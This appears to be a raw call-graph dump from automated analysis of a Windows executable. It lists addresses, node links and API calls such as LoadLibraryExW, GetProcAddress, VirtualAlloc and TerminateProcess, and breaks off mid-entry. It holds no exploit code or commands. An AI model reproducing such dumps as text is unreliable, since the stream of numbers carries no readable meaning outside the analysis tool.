EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96985->97356 96986 1001839 97358 100d217 256 API calls 96986->97358 96989 104636e 97362 106359c 82 API calls __wsopen_s 96989->97362 96990 1001872 97359 100faeb 23 API calls 96990->97359 96992 10463d1 97364 1075745 54 API calls _wcslen 96992->97364 96993 100153c 96995 1001940 9 API calls 96993->96995 96997 1001549 96995->96997 96996->96986 96996->96989 96998 100fddb 22 API calls 96996->96998 97005 100152f 96996->97005 97006 10463b2 96996->97006 97009 1046369 96996->97009 97060 ffec40 96996->97060 97338 100fe0b 96996->97338 97001 1001940 9 API calls 96997->97001 97002 10464fa 96997->97002 96998->96996 97008 1001563 97001->97008 97002->97009 97365 106359c 82 API calls __wsopen_s 97002->97365 97005->96992 97005->96993 97363 106359c 82 API calls __wsopen_s 97006->97363 97008->97002 97010 ffa8c7 22 API calls 97008->97010 97012 10015c7 messages 97008->97012 97009->96951 97010->97012 97011 1001940 9 API calls 97011->97012 97012->96990 97012->97002 97012->97009 97012->97011 97015 100167b messages 97012->97015 97084 1066ef1 97012->97084 97164 105d4ce 97012->97164 97167 107958b 97012->97167 97170 ff4f39 97012->97170 97176 107e204 97012->97176 97212 107959f 97012->97212 97215 106f0ec 97012->97215 97224 100effa 97012->97224 97281 106744a 97012->97281 97013 100171d 97013->96951 97015->97013 97348 100ce17 22 API calls messages 97015->97348 97025->96951 97026->96951 97027->96924 97028->96929 97029->96952 97031 ffa8ea __fread_nolock 97030->97031 97032 ffa8db 97030->97032 97031->96952 97032->97031 97033 100fe0b 22 API calls 97032->97033 97033->97031 97034->96952 97035->96952 97036->96949 97037->96952 97044 1023820 FindHandlerForForeignException 97038->97044 97039 102385e 97049 101f2d9 20 API calls _abort 97039->97049 97040 1023849 RtlAllocateHeap 97042 102385c 97040->97042 97040->97044 97042->96957 97044->97039 97044->97040 97048 1014ead 7 API calls 2 library calls 97044->97048 97045->96957 97046->96960 97047->96964 97048->97044 97049->97042 97051 1001981 97050->97051 97056 100195d 97050->97056 97366 1010242 5 API calls __Init_thread_wait 97051->97366 97053 100198b 97053->97056 97367 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97053->97367 97055 1008727 97059 10013a0 97055->97059 97369 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97055->97369 97056->97059 97368 1010242 5 API calls __Init_thread_wait 97056->97368 97059->96977 97076 ffec76 messages 97060->97076 97061 1044beb 97375 106359c 82 API calls __wsopen_s 97061->97375 97063 fffef7 97068 ffa8c7 22 API calls 97063->97068 97073 ffed9d messages 97063->97073 97064 100fddb 22 API calls 97064->97076 97066 1044600 97071 ffa8c7 22 API calls 97066->97071 97066->97073 97067 1044b0b 97373 106359c 82 API calls __wsopen_s 97067->97373 97068->97073 97071->97073 97073->96996 97074 1010242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97074->97076 97075 ffa8c7 22 API calls 97075->97076 97076->97061 97076->97063 97076->97064 97076->97066 97076->97067 97076->97073 97076->97074 97076->97075 97077 fffbe3 97076->97077 97078 ffa961 22 API calls 97076->97078 97079 10100a3 29 API calls pre_c_initialization 97076->97079 97082 10101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97076->97082 97083 fff3ae messages 97076->97083 97370 10001e0 256 API calls 2 library calls 97076->97370 97371 10006a0 41 API calls messages 97076->97371 97077->97073 97080 1044bdc 97077->97080 97077->97083 97078->97076 97079->97076 97374 106359c 82 API calls __wsopen_s 97080->97374 97082->97076 97083->97073 97372 106359c 82 API calls __wsopen_s 97083->97372 97376 ffa961 97084->97376 97087 ffa961 22 API calls 97088 1066f26 97087->97088 97089 1066f3a 97088->97089 97589 ffb567 97088->97589 97381 ff7510 97089->97381 97092 10670bf 97404 ff4ecb 97092->97404 97093 1066fbc 97095 ff7510 53 API calls 97093->97095 97094 1066f57 _wcslen 97094->97092 97094->97093 97103 10670e9 97094->97103 97097 1066fc8 97095->97097 97101 ffa8c7 22 API calls 97097->97101 97107 1066fdb 97097->97107 97099 10670e5 97100 ffa961 22 API calls 97099->97100 97099->97103 97104 106711a 97100->97104 97101->97107 97102 ff4ecb 94 API calls 97102->97099 97103->97012 97105 ffa961 22 API calls 97104->97105 97109 1067126 97105->97109 97106 1067027 97108 ff7510 53 API calls 97106->97108 97107->97106 97110 1067005 97107->97110 97113 ffa8c7 22 API calls 97107->97113 97111 1067034 97108->97111 97112 ffa961 22 API calls 97109->97112 97594 ff33c6 97110->97594 97115 1067047 97111->97115 97116 106703d 97111->97116 97117 106712f 97112->97117 97113->97110 97603 105e199 GetFileAttributesW 97115->97603 97120 ffa8c7 22 API calls 97116->97120 97122 ffa961 22 API calls 97117->97122 97118 106700f 97119 ff7510 53 API calls 97118->97119 97123 106701b 97119->97123 97120->97115 97125 1067138 97122->97125 97126 ff6350 22 API calls 97123->97126 97124 1067050 97127 1067063 97124->97127 97130 ff4c6d 22 API calls 97124->97130 97128 ff7510 53 API calls 97125->97128 97126->97106 97129 ff7510 53 API calls 97127->97129 97137 1067069 97127->97137 97131 1067145 97128->97131 97132 10670a0 97129->97132 97130->97127 97426 ff525f 97131->97426 97604 105d076 57 API calls 97132->97604 97135 1067166 97468 ff4c6d 97135->97468 97137->97103 97139 10671a9 97141 ffa8c7 22 API calls 97139->97141 97140 ff4c6d 22 API calls 97142 1067186 97140->97142 97143 10671ba 97141->97143 97142->97139 97605 ff6b57 97142->97605 97471 ff6350 97143->97471 98299 105dbbe lstrlenW 97164->98299 98304 1077f59 97167->98304 97169 107959b 97169->97012 97171 ff4f43 97170->97171 97173 ff4f4a 97170->97173 97172 101e678 67 API calls 97171->97172 97172->97173 97174 ff4f6a FreeLibrary 97173->97174 97175 ff4f59 97173->97175 97174->97175 97175->97012 97177 ffa961 22 API calls 97176->97177 97178 107e21b 97177->97178 97179 ff7510 53 API calls 97178->97179 97180 107e22a 97179->97180 98396 ff6270 97180->98396 97183 ff7510 53 API calls 97184 107e24a 97183->97184 97185 107e2c7 97184->97185 97186 107e262 97184->97186 97187 ff7510 53 API calls 97185->97187 97188 ffb567 39 API calls 97186->97188 97189 107e2cc 97187->97189 97190 107e267 97188->97190 97191 107e314 97189->97191 97192 107e2d9 97189->97192 97190->97192 97195 107e280 97190->97195 97193 107e32c 97191->97193 97196 ffb567 39 API calls 97191->97196 98401 ff9c6e 97192->98401 97197 107e345 97193->97197 97199 ffb567 39 API calls 97193->97199 97198 ff6d25 22 API calls 97195->97198 97196->97193 97200 ffa8c7 22 API calls 97197->97200 97201 107e28d 97198->97201 97199->97197 97203 107e35f 97200->97203 97202 ff6350 22 API calls 97201->97202 97205 107e29b 97202->97205 98415 10592c8 43 API calls 97203->98415 97204 107e2e6 97204->97012 97207 ff6d25 22 API calls 97205->97207 97209 107e2b4 97207->97209 97208 107e2c2 98416 ff62b5 22 API calls 97208->98416 97210 ff6350 22 API calls 97209->97210 97210->97208 97213 1077f59 120 API calls 97212->97213 97214 10795af 97213->97214 97214->97012 97216 ff7510 53 API calls 97215->97216 97217 106f126 97216->97217 98417 ff9e90 97217->98417 97219 106f136 97220 106f15b 97219->97220 97221 ffec40 256 API calls 97219->97221 97222 ff9c6e 22 API calls 97220->97222 97223 106f15f 97220->97223 97221->97220 97222->97223 97223->97012 97225 ff9c6e 22 API calls 97224->97225 97226 100f012 97225->97226 97227 100fddb 22 API calls 97226->97227 97231 104f0a8 97226->97231 97229 100f02b 97227->97229 97230 100fe0b 22 API calls 97229->97230 97232 100f03c 97230->97232 97272 100f0a4 97231->97272 98505 1069caa 39 API calls 97231->98505 98473 ff6246 97232->98473 97234 ffb567 39 API calls 97236 104f10a 97234->97236 97238 100f0b1 97236->97238 97239 104f112 97236->97239 97237 ffa961 22 API calls 97240 100f04f 97237->97240 98454 100fa5b 97238->98454 97243 ffb567 39 API calls 97239->97243 97241 ff6246 CloseHandle 97240->97241 97244 100f056 97241->97244 97248 100f0b8 97243->97248 97245 ff7510 53 API calls 97244->97245 97246 100f062 97245->97246 97247 ff6246 CloseHandle 97246->97247 97249 100f06c 97247->97249 97250 104f127 97248->97250 97251 100f0d3 97248->97251 98477 ff5745 97249->98477 97254 100fe0b 22 API calls 97250->97254 97253 ff6270 22 API calls 97251->97253 97256 100f0db 97253->97256 97257 104f12c 97254->97257 98459 100f141 97256->98459 97265 104f140 97257->97265 98506 100f866 ReadFile SetFilePointerEx 97257->98506 97258 104f0a0 98504 ff6216 CloseHandle messages 97258->98504 97262 100f085 98485 ff53de 97262->98485 97263 100f0ea 97269 104f144 __fread_nolock 97263->97269 98501 ff62b5 22 API calls 97263->98501 97265->97269 98507 1060e85 22 API calls ___scrt_fastfail 97265->98507 97268 100f093 98500 ff53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97268->98500 97271 100f0fe 97273 100f138 97271->97273 97276 ff6246 CloseHandle 97271->97276 97272->97234 97272->97238 97273->97012 97274 100f09a 97274->97272 97275 104f069 97274->97275 98503 105ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97275->98503 97277 100f12c 97276->97277 97277->97273 98502 ff6216 CloseHandle messages 97277->98502 97279 104f080 97279->97272 97282 1067474 97281->97282 97283 1067469 97281->97283 97287 ffa961 22 API calls 97282->97287 97326 1067554 97282->97326 97284 ffb567 39 API calls 97283->97284 97284->97282 97285 100fddb 22 API calls 97286 1067587 97285->97286 97288 100fe0b 22 API calls 97286->97288 97289 1067495 97287->97289 97290 1067598 97288->97290 97291 ffa961 22 API calls 97289->97291 97293 ff6246 CloseHandle 97290->97293 97292 106749e 97291->97292 97294 ff7510 53 API calls 97292->97294 97295 10675a3 97293->97295 97296 10674aa 97294->97296 97297 ffa961 22 API calls 97295->97297 97298 ff525f 22 API calls 97296->97298 97299 10675ab 97297->97299 97300 10674bf 97298->97300 97301 ff6246 CloseHandle 97299->97301 97302 ff6350 22 API calls 97300->97302 97303 10675b2 97301->97303 97304 10674f2 97302->97304 97305 ff7510 53 API calls 97303->97305 97306 106754a 97304->97306 97308 105d4ce 4 API calls 97304->97308 97307 10675be 97305->97307 97310 ffb567 39 API calls 97306->97310 97309 ff6246 CloseHandle 97307->97309 97311 1067502 97308->97311 97313 10675c8 97309->97313 97310->97326 97311->97306 97312 1067506 97311->97312 97315 ff9cb3 22 API calls 97312->97315 97314 ff5745 5 API calls 97313->97314 97316 10675e2 97314->97316 97317 1067513 97315->97317 97318 10676de GetLastError 97316->97318 97319 10675ea 97316->97319 98551 105d2c1 26 API calls 97317->98551 97321 10676f7 97318->97321 97322 ff53de 27 API calls 97319->97322 98555 ff6216 CloseHandle messages 97321->98555 97325 10675f8 97322->97325 97324 106751c 97324->97306 98552 ff53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97325->98552 97326->97285 97336 10676a4 97326->97336 97328 1067645 97329 100fddb 22 API calls 97328->97329 97332 1067679 97329->97332 97330 10675ff 97330->97328 97331 1067619 97330->97331 98553 105ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97331->98553 97334 ffa961 22 API calls 97332->97334 97335 1067686 97334->97335 97335->97336 98554 105417d 22 API calls __fread_nolock 97335->98554 97336->97012 97340 100fddb 97338->97340 97339 101ea0c ___std_exception_copy 21 API calls 97339->97340 97340->97339 97341 100fdfa 97340->97341 97344 100fdfc 97340->97344 98556 1014ead 7 API calls 2 library calls 97340->98556 97341->96996 97343 101066d 98558 10132a4 RaiseException 97343->98558 97344->97343 98557 10132a4 RaiseException 97344->98557 97347 101068a 97347->96996 97348->97015 97349->96974 97351 ff9cc2 _wcslen 97350->97351 97352 100fe0b 22 API calls 97351->97352 97353 ff9cea __fread_nolock 97352->97353 97354 100fddb 22 API calls 97353->97354 97355 ff9d00 97354->97355 97355->96985 97356->96976 97357->96986 97358->96990 97359->96990 97360->96972 97361->97009 97362->97009 97363->97009 97364->97008 97365->97009 97366->97053 97367->97056 97368->97055 97369->97059 97370->97076 97371->97076 97372->97073 97373->97073 97374->97061 97375->97073 97377 100fe0b 22 API calls 97376->97377 97378 ffa976 97377->97378 97379 100fddb 22 API calls 97378->97379 97380 ffa984 97379->97380 97380->97087 97382 ff7525 97381->97382 97399 ff7522 97381->97399 97383 ff752d 97382->97383 97384 ff755b 97382->97384 97617 10151c6 26 API calls 97383->97617 97385 10350f6 97384->97385 97388 ff756d 97384->97388 97396 103500f 97384->97396 97620 1015183 26 API calls 97385->97620 97618 100fb21 51 API calls 97388->97618 97389 ff753d 97392 100fddb 22 API calls 97389->97392 97390 103510e 97390->97390 97394 ff7547 97392->97394 97397 ff9cb3 22 API calls 97394->97397 97395 1035088 97619 100fb21 51 API calls 97395->97619 97396->97395 97398 100fe0b 22 API calls 97396->97398 97397->97399 97400 1035058 97398->97400 97399->97094 97401 100fddb 22 API calls 97400->97401 97402 103507f 97401->97402 97403 ff9cb3 22 API calls 97402->97403 97403->97395 97621 ff4e90 LoadLibraryA 97404->97621 97409 ff4ef6 LoadLibraryExW 97629 ff4e59 LoadLibraryA 97409->97629 97410 1033ccf 97411 ff4f39 68 API calls 97410->97411 97413 1033cd6 97411->97413 97416 ff4e59 3 API calls 97413->97416 97418 1033cde 97416->97418 97417 ff4f20 97417->97418 97419 ff4f2c 97417->97419 97651 ff50f5 97418->97651 97420 ff4f39 68 API calls 97419->97420 97422 ff4f31 97420->97422 97422->97099 97422->97102 97425 1033d05 97427 ffa961 22 API calls 97426->97427 97428 ff5275 97427->97428 97429 ffa961 22 API calls 97428->97429 97430 ff527d 97429->97430 97431 ffa961 22 API calls 97430->97431 97432 ff5285 97431->97432 97433 ffa961 22 API calls 97432->97433 97434 ff528d 97433->97434 97435 1033df5 97434->97435 97436 ff52c1 97434->97436 97437 ffa8c7 22 API calls 97435->97437 97438 ff6d25 22 API calls 97436->97438 97439 1033dfe 97437->97439 97440 ff52cf 97438->97440 97959 ffa6c3 97439->97959 97955 ff93b2 97440->97955 97443 ff52d9 97444 ff5304 97443->97444 97445 ff6d25 22 API calls 97443->97445 97446 ff5325 97444->97446 97461 ff5349 97444->97461 97463 1033e20 97444->97463 97448 ff52fa 97445->97448 97451 ff4c6d 22 API calls 97446->97451 97446->97461 97450 ff93b2 22 API calls 97448->97450 97449 ff535a 97455 ffa8c7 22 API calls 97449->97455 97456 ff5370 97449->97456 97450->97444 97453 ff5332 97451->97453 97452 ff5384 97457 ff538f 97452->97457 97460 ffa8c7 22 API calls 97452->97460 97458 ff6d25 22 API calls 97453->97458 97453->97461 97454 ff6b57 22 API calls 97465 1033ee0 97454->97465 97455->97456 97456->97452 97459 ffa8c7 22 API calls 97456->97459 97462 ffa8c7 22 API calls 97457->97462 97466 ff539a 97457->97466 97458->97461 97459->97452 97460->97457 97942 ff6d25 97461->97942 97462->97466 97463->97454 97464 ff4c6d 22 API calls 97464->97465 97465->97461 97465->97464 97965 ff49bd 22 API calls __fread_nolock 97465->97965 97466->97135 97469 ffaec9 22 API calls 97468->97469 97470 ff4c78 97469->97470 97470->97139 97470->97140 97472 1034a51 97471->97472 97473 ff6362 97471->97473 97983 ff4a88 22 API calls __fread_nolock 97472->97983 97973 ff6373 97473->97973 97590 ffb578 97589->97590 97591 ffb57f 97589->97591 97590->97591 98287 10162d1 39 API calls _strftime 97590->98287 97591->97089 97593 ffb5c2 97593->97089 97595 ff33dd 97594->97595 97596 10330bb 97594->97596 98288 ff33ee 97595->98288 97598 100fddb 22 API calls 97596->97598 97600 10330c5 _wcslen 97598->97600 97599 ff33e8 97599->97118 97601 100fe0b 22 API calls 97600->97601 97602 10330fe __fread_nolock 97601->97602 97603->97124 97604->97137 97606 1034ba1 97605->97606 97608 ff6b67 _wcslen 97605->97608 97607 ff93b2 22 API calls 97606->97607 97609 1034baa 97607->97609 97610 ff6b7d 97608->97610 97611 ff6ba2 97608->97611 97609->97609 98298 ff6f34 22 API calls 97610->98298 97612 100fddb 22 API calls 97611->97612 97617->97389 97618->97389 97619->97385 97620->97390 97622 ff4ea8 GetProcAddress 97621->97622 97623 ff4ec6 97621->97623 97624 ff4eb8 97622->97624 97626 101e5eb 97623->97626 97624->97623 97625 ff4ebf FreeLibrary 97624->97625 97625->97623 97659 101e52a 97626->97659 97628 ff4eea 97628->97409 97628->97410 97630 ff4e6e GetProcAddress 97629->97630 97631 ff4e8d 97629->97631 97632 ff4e7e 97630->97632 97634 ff4f80 97631->97634 97632->97631 97633 ff4e86 FreeLibrary 97632->97633 97633->97631 97635 100fe0b 22 API calls 97634->97635 97636 ff4f95 97635->97636 97711 ff5722 97636->97711 97638 ff4fa1 __fread_nolock 97639 ff50a5 97638->97639 97640 1033d1d 97638->97640 97644 ff4fdc 97638->97644 97714 ff42a2 CreateStreamOnHGlobal 97639->97714 97725 106304d 74 API calls 97640->97725 97643 1033d22 97646 ff511f 64 API calls 97643->97646 97644->97643 97645 ff50f5 40 API calls 97644->97645 97649 ff506e messages 97644->97649 97720 ff511f 97644->97720 97645->97644 97647 1033d45 97646->97647 97648 ff50f5 40 API calls 97647->97648 97648->97649 97649->97417 97652 1033d70 97651->97652 97653 ff5107 97651->97653 97747 101e8c4 97653->97747 97656 10628fe 97897 106274e 97656->97897 97658 1062919 97658->97425 97661 101e536 ___scrt_is_nonwritable_in_current_image 97659->97661 97660 101e544 97684 101f2d9 20 API calls _abort 97660->97684 97661->97660 97663 101e574 97661->97663 97665 101e586 97663->97665 97666 101e579 97663->97666 97664 101e549 97685 10227ec 26 API calls pre_c_initialization 97664->97685 97676 1028061 97665->97676 97686 101f2d9 20 API calls _abort 97666->97686 97670 101e554 __wsopen_s 97670->97628 97671 101e58f 97672 101e5a2 97671->97672 97673 101e595 97671->97673 97688 101e5d4 LeaveCriticalSection __fread_nolock 97672->97688 97687 101f2d9 20 API calls _abort 97673->97687 97677 102806d ___scrt_is_nonwritable_in_current_image 97676->97677 97689 1022f5e EnterCriticalSection 97677->97689 97679 102807b 97690 10280fb 97679->97690 97683 10280ac __wsopen_s 97683->97671 97684->97664 97685->97670 97686->97670 97687->97670 97688->97670 97689->97679 97693 102811e 97690->97693 97691 1028177 97692 1024c7d FindHandlerForForeignException 20 API calls 97691->97692 97694 1028180 97692->97694 97693->97691 97699 1028088 97693->97699 97706 101918d EnterCriticalSection 97693->97706 97707 10191a1 LeaveCriticalSection 97693->97707 97696 10229c8 _free 20 API calls 97694->97696 97697 1028189 97696->97697 97697->97699 97708 1023405 11 API calls 2 library calls 97697->97708 97703 10280b7 97699->97703 97701 10281a8 97709 101918d EnterCriticalSection 97701->97709 97710 1022fa6 LeaveCriticalSection 97703->97710 97705 10280be 97705->97683 97706->97693 97707->97693 97708->97701 97709->97699 97710->97705 97712 100fddb 22 API calls 97711->97712 97713 ff5734 97712->97713 97713->97638 97715 ff42bc FindResourceExW 97714->97715 97719 ff42d9 97714->97719 97716 10335ba LoadResource 97715->97716 97715->97719 97717 10335cf SizeofResource 97716->97717 97716->97719 97718 10335e3 LockResource 97717->97718 97717->97719 97718->97719 97719->97644 97721 ff512e 97720->97721 97722 1033d90 97720->97722 97726 101ece3 97721->97726 97725->97643 97729 101eaaa 97726->97729 97728 ff513c 97728->97644 97733 101eab6 ___scrt_is_nonwritable_in_current_image 97729->97733 97730 101eac2 97742 101f2d9 20 API calls _abort 97730->97742 97732 101eae8 97744 101918d EnterCriticalSection 97732->97744 97733->97730 97733->97732 97734 101eac7 97743 10227ec 26 API calls pre_c_initialization 97734->97743 97737 101eaf4 97745 101ec0a 62 API calls 2 library calls 97737->97745 97739 101eb08 97746 101eb27 LeaveCriticalSection __fread_nolock 97739->97746 97741 101ead2 __wsopen_s 97741->97728 97742->97734 97743->97741 97744->97737 97745->97739 97746->97741 97750 101e8e1 97747->97750 97749 ff5118 97749->97656 97751 101e8ed ___scrt_is_nonwritable_in_current_image 97750->97751 97752 101e900 ___scrt_fastfail 97751->97752 97753 101e92d 97751->97753 97754 101e925 __wsopen_s 97751->97754 97777 101f2d9 20 API calls _abort 97752->97777 97763 101918d EnterCriticalSection 97753->97763 97754->97749 97757 101e937 97764 101e6f8 97757->97764 97758 101e91a 97778 10227ec 26 API calls pre_c_initialization 97758->97778 97763->97757 97766 101e70a ___scrt_fastfail 97764->97766 97770 101e727 97764->97770 97765 101e717 97852 101f2d9 20 API calls _abort 97765->97852 97766->97765 97766->97770 97773 101e76a __fread_nolock 97766->97773 97768 101e71c 97853 10227ec 26 API calls pre_c_initialization 97768->97853 97779 101e96c LeaveCriticalSection __fread_nolock 97770->97779 97771 101e886 ___scrt_fastfail 97855 101f2d9 20 API calls _abort 97771->97855 97773->97770 97773->97771 97780 101d955 97773->97780 97787 1028d45 97773->97787 97854 101cf78 26 API calls 4 library calls 97773->97854 97777->97758 97778->97754 97779->97754 97781 101d961 97780->97781 97782 101d976 97780->97782 97856 101f2d9 20 API calls _abort 97781->97856 97782->97773 97784 101d966 97857 10227ec 26 API calls pre_c_initialization 97784->97857 97786 101d971 97786->97773 97788 1028d57 97787->97788 97789 1028d6f 97787->97789 97867 101f2c6 20 API calls _abort 97788->97867 97790 10290d9 97789->97790 97796 1028db4 97789->97796 97889 101f2c6 20 API calls _abort 97790->97889 97793 1028d5c 97868 101f2d9 20 API calls _abort 97793->97868 97795 10290de 97890 101f2d9 20 API calls _abort 97795->97890 97797 1028d64 97796->97797 97799 1028dbf 97796->97799 97805 1028def 97796->97805 97797->97773 97869 101f2c6 20 API calls _abort 97799->97869 97800 1028dcc 97891 10227ec 26 API calls pre_c_initialization 97800->97891 97802 1028dc4 97870 101f2d9 20 API calls _abort 97802->97870 97806 1028e08 97805->97806 97807 1028e4a 97805->97807 97808 1028e2e 97805->97808 97806->97808 97841 1028e15 97806->97841 97874 1023820 97807->97874 97871 101f2c6 20 API calls _abort 97808->97871 97810 1028e33 97872 101f2d9 20 API calls _abort 97810->97872 97815 1028e3a 97873 10227ec 26 API calls pre_c_initialization 97815->97873 97816 1028fb3 97820 1029029 97816->97820 97823 1028fcc GetConsoleMode 97816->97823 97817 10229c8 _free 20 API calls 97818 1028e6a 97817->97818 97821 10229c8 _free 20 API calls 97818->97821 97822 102902d ReadFile 97820->97822 97824 1028e71 97821->97824 97825 10290a1 GetLastError 97822->97825 97826 1029047 97822->97826 97823->97820 97827 1028fdd 97823->97827 97828 1028e96 97824->97828 97829 1028e7b 97824->97829 97830 10290ae 97825->97830 97838 1029005 97825->97838 97826->97825 97836 102901e 97826->97836 97827->97822 97831 1028fe3 ReadConsoleW 97827->97831 97883 1029424 28 API calls __fread_nolock 97828->97883 97881 101f2d9 20 API calls _abort 97829->97881 97887 101f2d9 20 API calls _abort 97830->97887 97831->97836 97837 1028fff GetLastError 97831->97837 97832 10229c8 _free 20 API calls 97832->97797 97845 1029083 97836->97845 97846 102906c 97836->97846 97847 1028e45 __fread_nolock 97836->97847 97837->97838 97838->97847 97884 101f2a3 20 API calls __dosmaperr 97838->97884 97839 1028e80 97882 101f2c6 20 API calls _abort 97839->97882 97840 10290b3 97888 101f2c6 20 API calls _abort 97840->97888 97858 102f89b 97841->97858 97845->97847 97848 102909a 97845->97848 97885 1028a61 31 API calls 2 library calls 97846->97885 97847->97832 97886 10288a1 29 API calls __fread_nolock 97848->97886 97851 102909f 97851->97847 97852->97768 97853->97770 97854->97773 97855->97768 97856->97784 97857->97786 97859 102f8b5 97858->97859 97860 102f8a8 97858->97860 97862 102f8c1 97859->97862 97893 101f2d9 20 API calls _abort 97859->97893 97892 101f2d9 20 API calls _abort 97860->97892 97862->97816 97864 102f8ad 97864->97816 97865 102f8e2 97894 10227ec 26 API calls pre_c_initialization 97865->97894 97867->97793 97868->97797 97869->97802 97870->97800 97871->97810 97872->97815 97873->97847 97875 102385e 97874->97875 97879 102382e FindHandlerForForeignException 97874->97879 97896 101f2d9 20 API calls _abort 97875->97896 97876 1023849 RtlAllocateHeap 97878 102385c 97876->97878 97876->97879 97878->97817 97879->97875 97879->97876 97895 1014ead 7 API calls 2 library calls 97879->97895 97881->97839 97882->97847 97883->97841 97884->97847 97885->97847 97886->97851 97887->97840 97888->97847 97889->97795 97890->97800 97891->97797 97892->97864 97893->97865 97894->97864 97895->97879 97896->97878 97900 101e4e8 97897->97900 97899 106275d 97899->97658 97903 101e469 97900->97903 97902 101e505 97902->97899 97904 101e478 97903->97904 97905 101e48c 97903->97905 97918 101f2d9 20 API calls _abort 97904->97918 97910 101e488 __alldvrm 97905->97910 97911 102333f 97905->97911 97907 101e47d 97919 10227ec 26 API calls pre_c_initialization 97907->97919 97910->97902 97920 1022fd7 97911->97920 97914 102337e GetSystemTimeAsFileTime 97917 1023372 97914->97917 97916 102338f 97916->97910 97927 1010a8c 97917->97927 97918->97907 97919->97910 97921 1023007 97920->97921 97924 1023003 97920->97924 97921->97914 97921->97917 97922 1023027 97922->97921 97925 1023033 GetProcAddress 97922->97925 97924->97921 97924->97922 97934 1023073 97924->97934 97926 1023043 __crt_fast_encode_pointer 97925->97926 97926->97921 97928 1010a95 97927->97928 97929 1010a97 IsProcessorFeaturePresent 97927->97929 97928->97916 97931 1010c5d 97929->97931 97941 1010c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97931->97941 97933 1010d40 97933->97916 97935 1023094 LoadLibraryExW 97934->97935 97936 1023089 97934->97936 97937 10230b1 GetLastError 97935->97937 97938 10230c9 97935->97938 97936->97924 97937->97938 97939 10230bc LoadLibraryExW 97937->97939 97938->97936 97940 10230e0 FreeLibrary 97938->97940 97939->97938 97940->97936 97941->97933 97943 ff6d34 97942->97943 97944 ff6d91 97942->97944 97943->97944 97946 ff6d3f 97943->97946 97945 ff93b2 22 API calls 97944->97945 97947 ff6d62 __fread_nolock 97945->97947 97948 ff6d5a 97946->97948 97949 1034c9d 97946->97949 97947->97449 97966 ff6f34 22 API calls 97948->97966 97950 100fddb 22 API calls 97949->97950 97952 1034ca7 97950->97952 97953 100fe0b 22 API calls 97952->97953 97954 1034cda 97953->97954 97956 ff93c0 97955->97956 97957 ff93c9 __fread_nolock 97955->97957 97956->97957 97967 ffaec9 97956->97967 97957->97443 97957->97957 97960 ffa6dd 97959->97960 97961 ffa6d0 97959->97961 97962 100fddb 22 API calls 97960->97962 97961->97444 97963 ffa6e7 97962->97963 97964 100fe0b 22 API calls 97963->97964 97964->97961 97965->97465 97966->97947 97968 ffaedc 97967->97968 97972 ffaed9 __fread_nolock 97967->97972 97969 100fddb 22 API calls 97968->97969 97970 ffaee7 97969->97970 97971 100fe0b 22 API calls 97970->97971 97971->97972 97972->97957 97974 ff6382 97973->97974 97980 ff63b6 __fread_nolock 97973->97980 97974->97980 98287->97593 98289 ff33fe _wcslen 98288->98289 98290 103311d 98289->98290 98291 ff3411 98289->98291 98292 100fddb 22 API calls 98290->98292 98293 ffa587 22 API calls 98291->98293 98295 1033127 98292->98295 98294 ff341e __fread_nolock 98293->98294 98294->97599 98296 100fe0b 22 API calls 98295->98296 98297 1033157 __fread_nolock 98296->98297 98300 105d4d5 98299->98300 98301 105dbdc GetFileAttributesW 98299->98301 98300->97012 98301->98300 98302 105dbe8 FindFirstFileW 98301->98302 98302->98300 98303 105dbf9 FindClose 98302->98303 98303->98300 98305 ff7510 53 API calls 98304->98305 98306 1077f90 98305->98306 98309 1077fd5 messages 98306->98309 98342 1078cd3 98306->98342 98308 1078049 98308->98309 98316 ff7510 53 API calls 98308->98316 98328 1078281 98308->98328 98374 105417d 22 API calls __fread_nolock 98308->98374 98375 107851d 42 API calls _strftime 98308->98375 98309->97169 98310 107844f 98383 1078ee4 60 API calls 98310->98383 98311 107828f 98355 1077e86 98311->98355 98314 107845e 98314->98311 98315 107846a 98314->98315 98315->98309 98316->98308 98321 10782c8 98370 100fc70 98321->98370 98324 1078302 98377 ff63eb 22 API calls 98324->98377 98325 10782e8 98376 106359c 82 API calls __wsopen_s 98325->98376 98328->98310 98328->98311 98329 1078311 98378 ff6a50 22 API calls 98329->98378 98330 10782f3 GetCurrentProcess TerminateProcess 98330->98324 98332 107832a 98341 1078352 98332->98341 98379 10004f0 22 API calls 98332->98379 98334 10784c5 98334->98309 98336 10784d9 FreeLibrary 98334->98336 98335 1078341 98380 1078b7b 75 API calls 98335->98380 98336->98309 98341->98334 98381 10004f0 22 API calls 98341->98381 98382 ffaceb 23 API calls messages 98341->98382 98384 1078b7b 75 API calls 98341->98384 98343 ffaec9 22 API calls 98342->98343 98344 1078cee CharLowerBuffW 98343->98344 98385 1058e54 98344->98385 98348 ffa961 22 API calls 98349 1078d2a 98348->98349 98350 ff6d25 22 API calls 98349->98350 98351 1078d3e 98350->98351 98352 ff93b2 22 API calls 98351->98352 98354 1078d48 _wcslen 98352->98354 98353 1078e5e _wcslen 98353->98308 98354->98353 98392 107851d 42 API calls _strftime 98354->98392 98356 1077ea1 98355->98356 98360 1077eec 98355->98360 98357 100fe0b 22 API calls 98356->98357 98358 1077ec3 98357->98358 98359 100fddb 22 API calls 98358->98359 98358->98360 98359->98358 98361 1079096 98360->98361 98362 10792ab messages 98361->98362 98369 10790ba _strcat _wcslen 98361->98369 98362->98321 98363 ffb567 39 API calls 98363->98369 98364 ffb38f 39 API calls 98364->98369 98365 ffb6b5 39 API calls 98365->98369 98366 ff7510 53 API calls 98366->98369 98367 101ea0c 21 API calls ___std_exception_copy 98367->98369 98369->98362 98369->98363 98369->98364 98369->98365 98369->98366 98369->98367 98395 105efae 24 API calls _wcslen 98369->98395 98371 100fc85 98370->98371 98372 100fd1d VirtualAlloc 98371->98372 98373 100fceb 98371->98373 98372->98373 98373->98324 98373->98325 98374->98308 98375->98308 98376->98330 98377->98329 98378->98332 98379->98335 98380->98341 98381->98341 98382->98341 98383->98314 98384->98341 98387 